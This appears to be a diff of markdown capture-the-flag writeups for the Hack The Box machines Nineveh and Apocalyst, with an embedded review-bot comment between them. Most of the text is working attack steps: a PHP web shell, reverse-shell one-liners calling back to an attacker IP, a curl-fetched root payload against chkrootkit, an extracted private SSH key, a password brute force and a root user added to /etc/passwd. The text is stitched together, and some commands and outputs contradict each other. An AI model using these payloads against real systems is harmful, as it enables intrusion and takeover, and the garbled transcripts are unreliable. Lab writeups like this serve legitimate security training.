+ ---------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ---------------------------------------------------------------- ----------------------------------------
+ PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | exploits/php/webapps/24044.txt
+ phpLiteAdmin - 'table' SQL Injection | exploits/php/webapps/38228.txt
+ phpLiteAdmin 1.1 - Multiple Vulnerabilities | exploits/php/webapps/37515.txt
+ phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | exploits/php/webapps/39714.txt
+ ---------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → locate 24044.txt
+ /usr/share/exploitdb/exploits/php/webapps/24044.txt
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → cp /usr/share/exploitdb/exploits/php/webapps/24044.txt .
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → nano 24044.txt
+
+
+looking at the exploit 24044 we see that once logged in, we should be able to create a database with the .php extension, and within said table we can inject a command execution payload :
+
+
+
+You need to be aware though that the page we had before on **http://nineveh.htb/department/management.php** refers to a note named ninevehNotes.txt so if you decide to use another name for your malicious database, **it will not work as intended**. Once we're done naming the database correctly we create **a table** containing our **php RCE** content in the field, choosing **TEXT** as the type :
+
+
+ <****?php echo system($_REQUEST["cmd"]); ?****>
+
+` 
+
+and hitting "create" we see that we have successfully created the table we intended :
+
+
+ Table 'nihilist.php' has been created.
+ CREATE TABLE 'nihilist.php' ('<****?php echo system($_REQUEST["cmd"]); ?****>' TEXT)
+
+Once we're done here let's return to our previous url http://nineveh.htb/department/manage.php and this time trying to access our nihilist.php using the following URL :
+
+
+ http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd;=uname -a;which nc
+
+
+` 
+
+And we get remote code execution ! now let's try a reverse shell one liner connecting back to our port 9001 (which we have ready to listen with a nc -lvnp command.) but to do so, we first need to url encode our reverse shell one liner :
+
+
+ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 9001 >/tmp/f
+ rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.20+9001+>/tmp/f
+
+
+once url encoded we have the following url to browse to :
+
+
+ http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd;=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.20+9001+>/tmp/f
+
+
+` 
+
+and we get a reverse shell ! let's try to print out the user flag :
+
+
+ $ cd /home
+ $ ls
+ amrois
+ $ cd amrois
+ $ ls
+ user.txt
+ $ cat user.txt
+ cat: user.txt: Permission denied
+
+
+although as you can see, we do not have enough permissions to print out the user flag. so in order to do so we need to take a look at /var/www/ssl/secure_notes
+
+
+ $ cd /var/www/ssl/secure_notes
+ $ ls
+ index.html
+ nineveh.png
+
+
+browsing to this nineveh.png image, we are greeted with a 1497x746 png image :
+
+
+
+Let's first download it and run strings on it, to see if we can extract any useful hidden information :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → file nineveh.png
+ nineveh.png: PNG image data, 1497 x 746, 8-bit/color RGB, non-interlaced
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → strings nineveh.png
+
+
+running the strings command we successfully revealled both a private and a public ssh key :
+
+
+ 13126045656
+ 014730
+ ustar
+ www-data
+ www-data
+ **-----BEGIN RSA PRIVATE KEY-----
+ MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
+ H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
+ PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
+ FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
+ 3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
+ X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
+ KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
+ FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
+ GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
+ JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
+ 9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
+ Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
+ ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
+ 1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
+ vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
+ DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
+ P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
+ fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
+ tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
+ iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
+ MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
+ PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
+ i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
+ il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
+ fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
+ -----END RSA PRIVATE KEY-----**
+ secret/nineveh.pub
+ 0000644
+ 0000041
+ 0000041
+ 00000000620
+ 13126060277
+ 014541
+ ustar
+ www-data
+ www-data
+ **ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb**
+
+
+
+so we save them both locally :
+
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → nano pkey
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → nano pubkey
+
+
+
+before we use the ssh key though, we need to somehow open the port 22, so we check /etc/knockd.conf to see what we should do :
+
+
+ $ cat /etc/knockd.conf
+ [options]
+ logfile = /var/log/knockd.log
+ interface = ens33
+
+ [openSSH]
+ sequence = 571, 290, 911
+ seq_timeout = 5
+ start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
+ tcpflags = syn
+
+ [closeSSH]
+ sequence = 911,290,571
+ seq_timeout = 5
+ start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
+ tcpflags = syn
+
+
+Now we need to basically scan each of the mentionned ports (911,290,571) to open the port 22 (ssh), so we run the according nmap scan to scan the ports we need in the CORRECT sequence :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → for x in 571 290 911 22; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 14:41 GMT
+ Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
+ Nmap scan report for nineveh.htb (10.10.10.43)
+ Host is up.
+
+ PORT STATE SERVICE
+ 571/tcp filtered umeter
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 14:41 GMT
+ Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
+ Nmap scan report for nineveh.htb (10.10.10.43)
+ Host is up.
+
+ PORT STATE SERVICE
+ 290/tcp filtered unknown
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 14:41 GMT
+ Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
+ Nmap scan report for nineveh.htb (10.10.10.43)
+ Host is up.
+
+ PORT STATE SERVICE
+ 911/tcp filtered xact-backup
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-25 14:41 GMT
+ Nmap scan report for nineveh.htb (10.10.10.43)
+ Host is up (0.100s latency).
+
+ PORT STATE SERVICE
+ 22/tcp open ssh
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
+
+
+and port 22 is opened ! now let's connect with our ssh key as the user amrois:
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → chmod 600 pkey
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → ssh -i pkey amrois@10.10.10.43
+ The authenticity of host '10.10.10.43 (10.10.10.43)' can't be established.
+ ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.43' (ECDSA) to the list of known hosts.
+ Ubuntu 16.04.2 LTS
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 133 packages can be updated.
+ 66 updates are security updates.
+
+
+ You have mail.
+ Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
+ amrois@nineveh:~$ cat /home/amrois/user.txt
+ 82XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we finally have the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc we need to take a look at the /usr/bin/ directory containing the chkrootkit executable :
+
+
+ amrois@nineveh:/usr/bin$ cd ~
+ amrois@nineveh:~$ ls
+ user.txt
+ amrois@nineveh:/tmp$ which curl
+ /usr/bin/curl
+ amrois@nineveh:~$ ls -lash /usr/bin/ | grep chkroot
+ 76K -rwx--x--x 1 root root 75K Jul 2 2017 chkrootkit
+ amrois@nineveh:~$ file /usr/bin/chkrootkit
+ /usr/bin/chkrootkit: executable, regular file, no read permission
+
+
+and we see that it's owned by root ! now running a quick searchsploitcommand we see that we can do the following to gain root access thanks to this chkrootkit binary :
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → searchsploit chkrootkit
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Chkrootkit - Local Privilege Escalation (Metasploit) | exploits/linux/local/38775.rb
+ Chkrootkit 0.49 - Local Privilege Escalation | exploits/linux/local/33899.txt
+ ----------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → locate 33899.txt
+ /usr/share/exploitdb/exploits/linux/local/33899.txt
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → cat /usr/share/exploitdb/exploits/linux/local/33899.txt
+
+
+
+ Steps to reproduce:
+
+ - Put an executable file named 'update' with non-root owner in /tmp (not
+ mounted noexec, obviously)
+ - Run chkrootkit (as uid 0)
+
+ Result: The file /tmp/update will be executed as root, thus effectively
+ rooting your box, if malicious content is placed inside the file.
+
+ If an attacker knows you are periodically running chkrootkit (like in
+ cron.daily) and has write access to /tmp (not mounted noexec), he may
+ easily take advantage of this.
+
+
+
+so to replicate the aforementionned steps, we'll put into our update file placed in /tmp the reverse shell one liner we used twice already : uploading it thanks to the curl command which is there on the machine.
+
+
+ #!/bin/bash
+ bash -i >& /dev/tcp/10.10.14.20/9003 0>&1
+
+
+` _Terminal 1 :_
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → nano update
+
+ λ nihilist [ 10.10.14.20/23 ] [~/_HTB/nineveh]
+ → python -m SimpleHTTPServer 7070
+ Serving HTTP on 0.0.0.0 port 7070 ...
+
+
+` _Terminal 2 :_
+
+
+ amrois@nineveh:/tmp$ curl -sk http://10.10.14.20:7070/update > update
+ amrois@nineveh:/tmp$ ls -lash | grep update
+ 4.0K -rw-rw-r-- 1 amrois amrois 71 Feb 25 08:59 update
+ amrois@nineveh:/tmp$ chmod +x update
+
+ amrois@nineveh:~$ cat /tmp/update
+ #!/bin/bash
+ bash -i >& /dev/tcp/10.10.14.20/9003 0>&1
+
+
+` _Terminal 3 :_
+
+
+ λ nihilist [ 10.10.14.20/23 ] [~]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ connect to [10.10.14.20] from (UNKNOWN) [10.10.10.43] 41598
+ bash: cannot set terminal process group (19824): Inappropriate ioctl for device
+ bash: no job control in this shell
+ root@nineveh:~# cat /root/root.txt
+ cat /root/root.txt
+ 8aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And after waiting a minute for chkrootkit to execute our infected /tmp/update file, we get a reverse shell as root ! and we've been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
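Review bot: the database-versus-table naming in the phpLiteAdmin section contradicts itself and needs one clear sentence: the prose says the database must keep the ninevehNotes name, the transcript prints `Table 'nihilist.php' has been created.`, and the next paragraph says "trying to access our nihilist.php" while the URL actually requests `notes=/var/tmp/ninevehNotes.php`. State that the database file is `ninevehNotes.php` (the path manage.php includes) and that the table name only carries the PHP payload. The port-knock paragraph has the same problem: it lists the ports as "(911,290,571)", which is the closeSSH sequence from knockd.conf, while the loop correctly sends `571 290 911`; quote the openSSH sequence there, since the whole point of the paragraph is the order. Several commands are also damaged by markdown escaping: the hydra form string and the manage.php URLs read `&remember;=yes&logn;=Log+In&proc;_login=true` and `&cmd;=`, where the inserted `;` would be sent as part of the request and break it, and the payload shows as `<****?php echo system($_REQUEST["cmd"]); ?****>`; put these in fenced code blocks so `&` and `<?php` appear verbatim. The root section says "after waiting a minute for chkrootkit to execute" but never shows how chkrootkit is run as root on this host (the 33899 text only mentions cron.daily as a possibility); add the line that establishes the scheduled run. The chkrootkit transcript also jumps between `/usr/bin`, `~` and `/tmp` prompts without matching `cd` commands, so it reads as spliced; trim it to the `ls -lash` and `file` lines that make the point. The lone "` " lines after screenshots are empty image embeds and should be removed or given their targets. Spelling: "interecepted", "revealled", "mentionned", "aforementionned", "searchsploitcommand".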
diff --git a/Medium/11.md b/Medium/11.md
new file mode 100644
index 0000000..1a5ed32
--- /dev/null
+++ b/Medium/11.md
@@ -0,0 +1,381 @@
+# Apocalyst Writeup
+
+
+
+## Introduction :
+
+Apocalyst is a medium linux box released back in August 2017
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~]
+ → nmap -F 10.10.10.46
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 12:27 GMT
+ Nmap scan report for 10.10.10.46
+ Host is up (0.11s latency).
+ Not shown: 98 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.73 seconds
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~]
+ → nmap -sCV -p80,22 10.10.10.46
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 12:28 GMT
+ Nmap scan report for 10.10.10.46
+ Host is up (0.095s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 fd:ab:0f:c9:22:d5:f4:8f:7a:0a:29:11:b4:04:da:c9 (RSA)
+ | 256 76:92:39:0a:57:bd:f0:03:26:78:c7:db:1a:66:a5:bc (ECDSA)
+ |_ 256 12:12:cf:f1:7f:be:43:1f:d5:e6:6d:90:84:25:c8:bd (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-generator: WordPress 4.8
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: Apocalypse Preparation Blog
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 12.64 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up the 80th port running http so let's investigate it :
+
+
+
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → echo '10.10.10.46 apocalyst.htb' >> /etc/hosts
+
+
+` 
+
+Once we add the apocalyst.htb domain name to our /etc/hosts file, we fix the formatting issue of what seems to be a wordpress website. Now let's run the wpscan command to see if we can find anything obvious :
+
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → wpscan --url http://10.10.10.46 -e
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.8
+ Sponsored by Automattic - https://automattic.com/
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [+] URL: http://10.10.10.46/
+ [+] Started: Mon Mar 2 14:32:34 2020
+
+ Interesting Finding(s):
+
+ [+] http://10.10.10.46/
+ | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] http://10.10.10.46/xmlrpc.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+ | References:
+ | - http://codex.wordpress.org/XML-RPC_Pingback_API
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
+ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
+
+ [i] User(s) Identified:
+
+ [+] falaraki
+ | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
+ | Confirmed By: Login Error Messages (Aggressive Detection)
+
+ [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
+
+ [+] Finished: Mon Mar 2 14:33:48 2020
+ [+] Requests Done: 3064
+ [+] Cached Requests: 43
+ [+] Data Sent: 757.552 KB
+ [+] Data Received: 440.874 KB
+ [+] Memory used: 203.988 MB
+ [+] Elapsed time: 00:01:14
+
+
+
+And we have a username ! falaraki now let's make a directory wordlist using cewl, and then use owasp's dirbuster using the wordlist we created.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → cewl http://10.10.10.46 > directories.txt
+
+
+and now passing the wordlist to dirbuster :
+
+ 
+
+Here we see that there is something odd with the Rightiousness directory, the size of the response doesn't correspond to the others (421 and here 440) So upon further investigation, we see that the webpage in question has just one image in jpg format. Looking at the sourcecode we get hinted towards a "needle" or perhaps in this case, steganography that's why we'll use the steghide command :
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → wget http://10.10.10.46/Rightiousness/image.jpg
+ --2020-03-02 14:49:22-- http://10.10.10.46/Rightiousness/image.jpg
+ Connecting to 10.10.10.46:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 215541 (210K) [image/jpeg]
+ Saving to: ‘image.jpg’
+
+ image.jpg 100%[===============================================>] 210.49K 435KB/s in 0.5s
+
+ 2020-03-02 14:49:23 (435 KB/s) - ‘image.jpg’ saved [215541/215541]
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → steghide extract -sf image.jpg
+ Enter passphrase:
+ wrote extracted data to "list.txt".
+
+
+
+And we get a wordlist named "list.txt", let's try to use this wordlist as a password, using wpscan one more time.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → sudo wpscan --url http://apocalyst.htb --usernames falaraki --passwords list.txt
+ [sudo] password for nihilist:
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.8
+ Sponsored by Automattic - https://automattic.com/
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [+] URL: http://apocalyst.htb/
+ [+] Started: Mon Mar 2 14:53:34 2020
+
+ Interesting Finding(s):
+
+ [+] Performing password attack on Wp Login against 1 user/s
+ [SUCCESS] - falaraki / Transclisiation
+ Trying falaraki / total Time: 00:00:16 <==========================================> (335 / 335) 100.00% Time: 00:00:16
+
+ [i] Valid Combinations Found:
+ | Username: falaraki, Password: Transclisiation
+
+ [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
+
+ [+] Finished: Mon Mar 2 14:54:01 2020
+ [+] Requests Done: 388
+ [+] Cached Requests: 5
+ [+] Data Sent: 116.313 KB
+ [+] Data Received: 1.533 MB
+ [+] Memory used: 184.266 MB
+ [+] Elapsed time: 00:00:26
+
+
+and we have found credentials ! falaraki:Transclisiation so let's try to login at the corresponding url http://apocalyst.htb/wp-login :
+
+ 
+
+And we are logged in ! now moving over to the appearance page we'll upload our reverse php shell :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → locate nihilist.php
+ /home/nihilist/_HTB/Bastard/nihilist.php
+ /home/nihilist/_HTB/Cronos/nihilist.php
+ /home/nihilist/_HTB/Haircut/nihilist.php
+ /home/nihilist/_HTB/Networked/nihilist.php.gif
+ /home/nihilist/_HTB/October/nihilist.php5
+ /home/nihilist/_HTB/Popcorn/nihilist.php
+ /home/nihilist/_HTB/Popcorn/nihilist.php.gif
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → cp /home/nihilist/_HTB/Cronos/nihilist.php .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Apocalyst]
+ → nano nihilist.php
+
+
+
+ <****?php
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.11/9001 0>&1'");
+ ?****>
+
+` 
+
+Once we have updated the 404.php page we just have to browse to it for it to connect back to us:
+
+
+
+And we get a reverse shell as www-data ! let's see if we can print out the user flag :
+
+
+ www-data@apocalyst:/$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@apocalyst:/$ cd home
+ cd home
+ www-data@apocalyst:/home$ ls
+ ls
+ falaraki
+ www-data@apocalyst:/home$ cd falaraki
+ cd falaraki
+ www-data@apocalyst:/home/falaraki$ cat user.txt
+ cat user.txt
+ 91XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now before we attempt to privesc let's spawn a tty shell using python3, since python1 isn't there on the machine.
+
+
+ www-data@apocalyst:/home/falaraki$ which python
+ which python
+ www-data@apocalyst:/home/falaraki$ which python3
+ which python3
+ /usr/bin/python3
+ www-data@apocalyst:/home/falaraki$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@apocalyst:/home/falaraki$ ls
+ ls
+ user.txt
+
+ www-data@apocalyst:/home/falaraki$ which wget
+ which wget
+ /usr/bin/wget
+
+
+Now that we have wget on the machine, we can enumerate the machine by uploading LinEnum.sh into the /tmp directory.
+
+
+ ww-data@apocalyst:/home/falaraki$ cd /tmp
+ cd /tmp
+ www-data@apocalyst:/tmp$ wget 10.10.14.11:1234/LinEnum.sh
+ wget 10.10.14.11:1234/LinEnum.sh
+ --2020-03-02 15:28:52-- http://10.10.14.11:1234/LinEnum.sh
+ Connecting to 10.10.14.11:1234... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 46631 (46K) [text/x-sh]
+ Saving to: 'LinEnum.sh'
+
+ LinEnum.sh 100%[===================>] 45.54K 225KB/s in 0.2s
+
+ 2020-03-02 15:28:52 (225 KB/s) - 'LinEnum.sh' saved [46631/46631]
+
+ www-data@apocalyst:/tmp$ chmod +x LinEnum.sh
+ chmod +x LinEnum.sh
+ www-data@apocalyst:/tmp$ ./LinEnum.sh
+
+
+Then looking at the results, we see that we can read/write (RW) into sensitive files within /etc most notably passwd, group, noprofile or shadow. so let's use openssl to generate a password (123) :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → openssl passwd -1
+ Password:
+ Verifying - Password:
+ $1$nxydvNly$fw09LyfykjjXEd3RXeRo5/
+
+
+Now with this we can construct a line to add in /etc/passwd :
+
+
+ root2:$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/:0:0:root2:/root:/bin/bash
+
+
+
+ www-data@apocalyst:/etc$ echo 'root2:$1$nxydvNly$fw09LyfykjjXEd3RXeRo5/:0:0:root2:/root:/bin/bash' >> passwd
+
+ www-data@apocalyst:/etc$ cat passwd
+ cat passwd
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ syslog:x:104:108::/home/syslog:/bin/false
+ _apt:x:105:65534::/nonexistent:/bin/false
+ lxd:x:106:65534::/var/lib/lxd/:/bin/false
+ messagebus:x:107:111::/var/run/dbus:/bin/false
+ uuidd:x:108:112::/run/uuidd:/bin/false
+ dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+ falaraki:x:1000:1000:Falaraki Rainiti,,,:/home/falaraki:/bin/bash
+ sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
+ mysql:x:111:118:MySQL Server,,,:/nonexistent:/bin/false
+ nihilist:$1$k48ck7uo$/CibZLSHGr7wiCQJWNQNW./:0:0:nihilist:/root:/bin/bash
